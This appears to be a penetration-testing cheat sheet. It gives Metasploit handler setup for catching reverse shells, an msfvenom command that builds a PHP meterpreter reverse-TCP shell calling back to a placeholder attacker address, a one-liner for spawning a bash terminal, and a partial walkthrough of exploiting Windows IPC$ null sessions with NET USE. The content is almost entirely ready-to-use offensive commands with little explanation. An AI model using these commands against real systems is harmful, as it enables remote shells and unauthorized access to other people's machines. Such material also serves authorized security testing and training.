./ Handlers

msf6 > use exploit/multi/handler
msf6 > set PAYLOAD <Payload name>
msf6 > set LHOST <LHOST value>
msf6 > set LPORT <LPORT value>
msf6 > set ExitOnSession false
msf6 > exploit -j -z

Once the required values are completed the following command will execute your handler: ‘msfconsole -L -r’

./ Scripting Payloads


msfvenom -p php/meterpreter_reverse_tcp lhost=<your-IP-address> lport=<your-port-address> -o shell.php


./ Spawn a terminal

python -c 'import pty;pty.spawn("/bin/bash")';
Checking for Null Sessions To verify that, we will exploit the IPC$ administrative share by trying to connect to it without valid credentials. To connect, you have to type the following command in a Windows shell: ```bash > NET USE \\\IPC$ '' /u:'' ``` This tells Windows to connect to the IPC$ share by using an empty password and an empty username! Let's try the command on our target:

The previous command establishes a connection to the IPC$ administrative share without specifying a user; this is possible because our target host is vulnerable to null session attacks. This test only works with the IPC$. For example, it does not work with C$: Example:

You can also perform the very same checks by using smbclient: